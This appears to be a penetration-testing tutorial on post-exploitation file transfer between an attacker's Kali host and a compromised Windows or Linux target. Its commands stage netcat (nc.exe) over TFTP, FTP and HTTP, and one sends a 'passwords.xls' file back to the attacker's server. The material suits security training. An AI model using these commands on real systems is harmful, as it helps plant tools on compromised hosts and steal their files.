Uploading / Downloading Files

After we gained a foothold on our target (exploitation) we want to upload and download files.

In our first stage we are limited to what the exploited target offers.

Some examples are:

  • tftp
  • ftp (sftp / ftps)
  • wget (http)
  • curl
  • bits (windows)
  • smb
  • netcat
  • custom scripts that make use of the available script interpreters:
    • Powershell (windows)
    • Visual Basic (windows)
    • perl
    • python
    • etc


Create a the tftp directory on our attacking host.
Start tftp server
Copy nc binary to tftp root

mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/

Verify if tftp client is available on our target windows host:

Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.
  host            Specifies the local or remote host.
  GET             Transfers the file destination on the remote host to
                  the file source on the local host.
  PUT             Transfers the file source on the local host to
                  the file destination on the remote host.
  source          Specifies the file to transfer.
  destination     Specifies where to transfer the file.

Download nc.exe via tftp on Windows platform

tftp -i <ipaddress of tftpserver> get nc.exe

Upload file from target to our tftp server:

tftp -i <ipaddress of tftpserver> put passwords.xls

Start FTP server on our attacking host (kali)

Installation and configuration of pure-ftp can be found here.

FTP on target

If we have FTP running on our target we can upload files via this service.

FTP client on target

If we have a FTP client on our target we can use this to download files from our attacking host.

On Windows we check if ftp.exe is available:

C:\WINDOWS\system32>dir ftp.*
dir ftp.*
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741
 Directory of C:\WINDOWS\system32
08/30/2002  02:00 PM            40,448 ftp.exe
08/30/2002  02:00 PM             6,179 ftp.mib
               2 File(s)         46,627 bytes
               0 Dir(s)   1,662,689,280 bytes free

If ftp.exe is available we have to create a inputfile with the ftp commands to execute.
(we can’t run ftp.exe inactive)

echo open 21> ftp.txt
echo USER username>> ftp.txt
echo password>> ftp.txt
echo bin>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt

Run ftp.exe with inputfile

ftp -n -s:ftp.txt


Start HTTP server on our attacking host (kali)

We can start a HTTP server that service files to be downloaded by our target Start apache on kali

service apache2 start

Start python simplehttp server in the directory with the files you want to serve.

python -m SimpleHTTPServer 80

HTTP client on our target

On most linux host we have wget and curl available to download files via http.
On windows hosts we can use powershell or vbscript to download files via http.